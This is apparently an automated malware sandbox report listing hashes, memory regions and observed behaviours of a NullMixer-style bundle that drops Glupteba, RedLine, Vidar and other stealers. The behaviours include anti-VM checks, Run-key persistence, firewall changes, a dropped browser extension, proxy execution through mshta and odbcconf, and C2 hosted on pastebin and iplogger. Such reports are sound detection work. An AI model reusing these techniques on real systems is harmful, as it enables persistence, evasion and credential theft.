| SHA512 | 821b1a05601bbaee21cbd0b3cf2859359795ae55a3df8dea81f1142ede74b52af31273ffbbba772d77e40477853e6b02c9df8c44fc2ddad1cf3d248530427fc0 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15132bf2c585337a0.exe
| MD5 | 1f9b3bc156f958523739194cd2733887 |
| SHA1 | 524816ed7d4616af3137cf6dd48310441efdea3b |
| SHA256 | 3e2b6469551fac2d98c0efb1668096a4b247d30a1a0f40b1b2b16c3a78218abd |
| SHA512 | 296ce4dffa32bff8b04ad542e55832695c2643426def71aa8b4fc9973691eafb84bbc645abbde3ee96fb8b25322152e9ab68b550bf2f220ec8a38fba5747a16c |
memory/2188-172-0x0000000000400000-0x00000000004DE000-memory.dmp
memory/2664-171-0x00000000020D0000-0x00000000021AE000-memory.dmp
memory/2204-170-0x0000000001110000-0x00000000015AE000-memory.dmp
memory/2204-169-0x0000000001110000-0x00000000015AE000-memory.dmp
memory/2204-168-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/1932-167-0x00000000027B0000-0x0000000002C4E000-memory.dmp
memory/1052-166-0x0000000002850000-0x000000000292E000-memory.dmp
memory/1052-165-0x0000000002850000-0x000000000292E000-memory.dmp
memory/2204-159-0x00000000000C0000-0x00000000000C1000-memory.dmp
memory/2860-158-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2204-157-0x0000000000310000-0x0000000000355000-memory.dmp
memory/2204-156-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-155-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-154-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-153-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-152-0x0000000000C70000-0x000000000110E000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15168f90478cc7.exe
| MD5 | 831ec888d8238e49c4371f643fdcaa9e |
| SHA1 | 5991867930cc585e201d50e7d76a7afada780f90 |
| SHA256 | 26ef4111e91e052367a9b8daed46b3684acf8ed665fe1b6bdf751995557fadb9 |
| SHA512 | d926bde2f13852fc084ec48e8baf00c36e06644f6d6a59918715752c5f092d7e258cca650d241f3d480713e8085aa1f17897fe9edea4764262c46be653de4609 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe
| MD5 | 4bb6c620715fe25e76d4cca1e68bef89 |
| SHA1 | 0cf2a7aad7ad7a804ca2b7ccaea1a6aadd75fb80 |
| SHA256 | 0b668d0ac89d5da1526be831f7b8c3f2af54c5dbc68c0c9ce886183ec518c051 |
| SHA512 | 59203e7c93eda1698f25ee000c7be02d39eee5a0c3f615ae6b540c7a76e6d47265d4354fa38be5206810e6b035b8be1794ebe324c0e9db33360a4f0dd3910549 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe
| MD5 | 204801e838e4a29f8270ab0ed7626555 |
| SHA1 | 6ff2c20dc096eefa8084c97c30d95299880862b0 |
| SHA256 | 13357a53f4c23bd8ac44790aa1db3233614c981ded62949559f63e841354276a |
| SHA512 | 008e6cb08094621bbcadfca32cc611a4a8c78158365e5c81eb58c4e7d5b7e3d36c88b543390120104f1c70c5393b1c1c38c33761cf65736fdf6873648df3fc8e |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe
| MD5 | 43e459f57576305386c2a225bfc0c207 |
| SHA1 | 13511d3f0d41fe28981961f87c3c29dc1aa46a70 |
| SHA256 | fb58f709914380bce2e643aa0f64cd5458cb8b29c8f072cd1645e42947f89787 |
| SHA512 | 33cbcc6fb73147b7b3f2007be904faf01dc04b0e773bb1cfe6290f141b1f01cb260cd4f3826e30ab8c60d981bcc1b7f60e17ab7146ba32c94c87ac3a2b717207 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe
| MD5 | fb8851a1a68d306eb1623bad276012c3 |
| SHA1 | 33c2e2a59351591807853e58c24edb925e56a216 |
| SHA256 | d222076f428d9d190f72e7d6b0373083f2659804fdb2265603aa66efd640ff7e |
| SHA512 | 3ad2114d8ebde46e981f7ef261ace24a5a47674987047199d22eeeca82c3dd05aeed9a01ff1e6df11a180c051063c9d55cab09e923e8229e0d08e62b46d99b6a |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15e81af69f990d3a6.exe
| MD5 | 4c35bc57b828bf39daef6918bb5e2249 |
| SHA1 | a838099c13778642ab1ff8ed8051ff4a5e07acae |
| SHA256 | bfc863ff5634087b983d29c2e0429240dffef2a379f0072802e01e69483027d3 |
| SHA512 | 946e23a8d78ba0cfe7511e9f1a443ebe97a806e5614eb6f6e94602eeb04eb03ea87446e0b2c57e6102dad8ef09a7b46c10841aeebbffe4be81aad236608a2f3b |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1580e9cd8c23e.exe
| MD5 | 88c2669e0bd058696300a9e233961b93 |
| SHA1 | fdbdc7399faa62ef2d811053a5053cd5d543a24b |
| SHA256 | 4e3c72337ad6ede0f71934734ba639a39949c003d7943cb946ea4173b23fd0b7 |
| SHA512 | e159767dbf9ce9cce58ee9ee8f2edeffdc9edcf56253ccd880b5f55014c56e267fdb8fdeb8e18c1bd2285e4a31938053c488ee52722d540352d6093dbe974e9c |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun150e9a93676ff.exe
| MD5 | 53759f6f2d4f415a67f64fd445006dd0 |
| SHA1 | f8af2bb0056cb578711724dd435185103abf2469 |
| SHA256 | 7477156f6856ac506c7ca631978c2369e70c759eb65895dfce8ba4cfce608d58 |
| SHA512 | 6c7cb5d0fb8efc43425dca72711c017971536ed74a7c4fe3e9cc47e63b8fe1f586a762d3c7edcee193250b4693382233720cc7b88fc6ca0f8f14b8769a77a5d9 |
memory/2204-180-0x0000000077160000-0x000000007716C000-memory.dmp
memory/2204-179-0x00000000745E0000-0x00000000745F7000-memory.dmp
memory/2204-178-0x0000000074BD0000-0x0000000074BE7000-memory.dmp
memory/2204-162-0x0000000075DF0000-0x0000000075E37000-memory.dmp
memory/2204-160-0x00000000751E0000-0x000000007528C000-memory.dmp
memory/2204-177-0x0000000074BC0000-0x0000000074BCB000-memory.dmp
memory/1652-183-0x0000000000230000-0x000000000030E000-memory.dmp
memory/1652-182-0x0000000000230000-0x000000000030E000-memory.dmp
memory/2204-164-0x0000000076E10000-0x0000000076F6C000-memory.dmp
memory/1652-176-0x0000000000400000-0x00000000004DE000-memory.dmp
memory/2344-185-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/2152-184-0x0000000002830000-0x0000000002C2A000-memory.dmp
memory/640-186-0x0000000000240000-0x0000000000246000-memory.dmp
memory/348-187-0x0000000001270000-0x00000000012FC000-memory.dmp
memory/2204-181-0x0000000077170000-0x000000007728D000-memory.dmp
memory/2204-188-0x0000000074590000-0x00000000745DF000-memory.dmp
memory/2204-189-0x00000000743A0000-0x00000000743F8000-memory.dmp
memory/1876-192-0x0000000000C30000-0x0000000000CC9000-memory.dmp
memory/2072-191-0x00000000003E0000-0x0000000000479000-memory.dmp
memory/276-193-0x0000000001260000-0x0000000001394000-memory.dmp
memory/2344-196-0x0000000000D40000-0x000000000113A000-memory.dmp
memory/1052-198-0x0000000002850000-0x000000000292E000-memory.dmp
memory/2344-197-0x0000000000D40000-0x000000000113A000-memory.dmp
memory/2552-194-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/2204-200-0x0000000001110000-0x00000000015AE000-memory.dmp
memory/2204-199-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2344-206-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/1876-204-0x0000000000100000-0x0000000000199000-memory.dmp
memory/2204-225-0x0000000075760000-0x0000000075779000-memory.dmp
memory/2204-224-0x0000000075170000-0x000000007517C000-memory.dmp
memory/2204-223-0x0000000075720000-0x0000000075755000-memory.dmp
memory/2204-222-0x0000000075A10000-0x0000000075A67000-memory.dmp
memory/2204-221-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-220-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-219-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/1876-218-0x000000006DA50000-0x000000006DAD4000-memory.dmp
memory/1876-217-0x0000000075A10000-0x0000000075A67000-memory.dmp
memory/1876-216-0x0000000075DF0000-0x0000000075E37000-memory.dmp
memory/1876-215-0x00000000751E0000-0x000000007528C000-memory.dmp
memory/1876-213-0x0000000000380000-0x00000000003C5000-memory.dmp
memory/1876-212-0x0000000000120000-0x0000000000121000-memory.dmp
memory/2204-211-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-210-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-209-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/2204-208-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/1876-207-0x0000000000C30000-0x0000000000CC9000-memory.dmp
memory/1876-203-0x0000000000100000-0x0000000000199000-memory.dmp
memory/2344-202-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/1876-201-0x0000000074810000-0x000000007485A000-memory.dmp
memory/2204-190-0x0000000074400000-0x0000000074590000-memory.dmp
memory/2204-227-0x000000006FEC0000-0x000000006FF04000-memory.dmp
memory/1652-230-0x0000000000400000-0x00000000004DE000-memory.dmp
memory/2648-237-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/2552-241-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/2828-240-0x0000000000400000-0x0000000000682000-memory.dmp
memory/1652-245-0x0000000000230000-0x000000000030E000-memory.dmp
memory/1652-244-0x0000000000230000-0x000000000030E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-KHILQ.tmp\Sun15b94526a807b.tmp
| MD5 | a6865d7dffcc927d975be63b76147e20 |
| SHA1 | 28e7edab84163cc2d0c864820bef89bae6f56bf8 |
| SHA256 | fdfcbc8cfb57a3451a3d148e50794772d477ed6cc434acc779f1f0dd63e93f4b |
| SHA512 | a9d2b59b40793fb685911f0e452e43a8e83c1bd133fda8a2a210ef1b9ca7ad419b8502fbb75b37f1b0fdef6ad0381b7d910fbff0bcfdeeec9e26b81d11effcec |
memory/1652-246-0x0000000000400000-0x00000000004DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-G5S7L.tmp\idp.dll
| MD5 | 55c310c0319260d798757557ab3bf636 |
| SHA1 | 0892eb7ed31d8bb20a56c6835990749011a2d8de |
| SHA256 | 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed |
| SHA512 | e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57 |
memory/2152-252-0x0000000002830000-0x0000000002C2A000-memory.dmp
memory/2204-263-0x00000000751E0000-0x000000007528C000-memory.dmp
memory/2204-261-0x0000000075DF0000-0x0000000075E37000-memory.dmp
memory/1876-284-0x0000000000C30000-0x0000000000CC9000-memory.dmp
memory/2072-283-0x00000000003E0000-0x0000000000479000-memory.dmp
memory/2204-260-0x0000000000C70000-0x000000000110E000-memory.dmp
memory/276-285-0x0000000000800000-0x000000000080C000-memory.dmp
memory/2344-307-0x0000000000D40000-0x000000000113A000-memory.dmp
memory/1876-312-0x0000000000100000-0x0000000000199000-memory.dmp
memory/1876-336-0x0000000000100000-0x0000000000199000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabFA46.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1876-368-0x0000000000C30000-0x0000000000CC9000-memory.dmp
memory/2188-379-0x0000000000400000-0x00000000004DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar40E8.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ac90a0fb371b765d49a98c44d26006d4 |
| SHA1 | 2231c042821688aebc41d5f442ea75e1b87d7e33 |
| SHA256 | 91515cecc1a004016da10ea0e2d2615e39dc0813eebd7ecea13b78bb4c0cf252 |
| SHA512 | 3780b56a0f1befa830120f8aa12ff189988dba5cc61f399335b4e8e6d3144c702e9edfe39d1857200f99272650b5a9bfbcbfd13733ec1eaa74312709c839b818 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e8f7b2d5ec3e00a0c7db759fd697690b |
| SHA1 | e53a764f245fba1e0e46cffd67fa94710b6b5ccb |
| SHA256 | 94d6f6d896acf8b405250a838859e02ef2413cb9955861ed5845cd8307490e8a |
| SHA512 | a17d3e1cfa4068350abec8a10f0cd9341736b9660b935904eff4edfe0c27baf017d58d7d408aa641933175ea8a4eda410b4cf6d300d74b2be2d2ae5cf8cd24e7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7b34192fd4452d05ff342efc890fa2e3 |
| SHA1 | 251b06ea3734b43114031ebe266445b731fbfa29 |
| SHA256 | 93cc442fcf0b62fc7e0fd14e879e77cb28f354633dae21a4f794301fbc92d9fd |
| SHA512 | 9a0d10cb893f0df01c13ce8e5fd6c242ae8ed0521caf0a20c2a4896866db00ca0d3b03fdeeb133ea5457f925b80b9d723c3bbdc4c410134a341dde188b1fd612 |
memory/276-636-0x00000000057D0000-0x00000000058B8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4cab84d1f77bc810f918717e1a68021d |
| SHA1 | a80ae6c7e178500daf339a0e9eb60ff3b2adae08 |
| SHA256 | c9f2faafd0ebdfa36751819a1f4ed04051e9aa632ebd69b99cb22b1ff005dd27 |
| SHA512 | 9a7f4c2829efbe12dd52994e039a50ef841abedb981bc4cd6a53aa113c1a370d23a5f2b0fb970bce6eb24a0c995f9e35f02abd226566caa00f5d967fc23ffafd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 89a4f3bd81645f76421caaecbec1d617 |
| SHA1 | d1bebffedb1c4f1f4e425c2e19cabef2e2ca4a11 |
| SHA256 | eff106ef411b5af7122d6c4a3ef63aa6ec214461193a17d7b8d005c32d166b11 |
| SHA512 | 5fdba212d4572d71096bb8fcb117664318a95b827a5fe0bcd0e4599208674adee10a0a37eacbf79160aff14603da0e25d4d2802215c57595cc307bc4e9e7eb66 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6B2043001D270792DFFD725518EAFE2C
| MD5 | f55da450a5fb287e1e0f0dcc965756ca |
| SHA1 | 7e04de896a3e666d00e687d33ffad93be83d349e |
| SHA256 | 31ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0 |
| SHA512 | 19bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
memory/2676-1505-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
memory/2676-1512-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F91VN88R\suggestions[1].en-US
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
C:\Users\Admin\AppData\Local\Temp\osloader.exe
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 10:35
Reported
2024-11-08 10:38
Platform
win10v2004-20241007-en
Max time kernel
79s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
Glupteba
Glupteba family
Glupteba payload
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
Socelars
Socelars family
Socelars payload
Vidar
Vidar family
Detected Nirsoft tools
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe | N/A |
NirSoft WebBrowserPassView
Vidar Stealer
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
ASPack v2.12-2.42
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfhgpjbcoignfibliobpclhpfnadhofn\10.59.13_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15132bf2c585337a0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1515dbfc0edab0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 692 set thread context of 3820 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe |
| PID 2988 set thread context of 1060 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
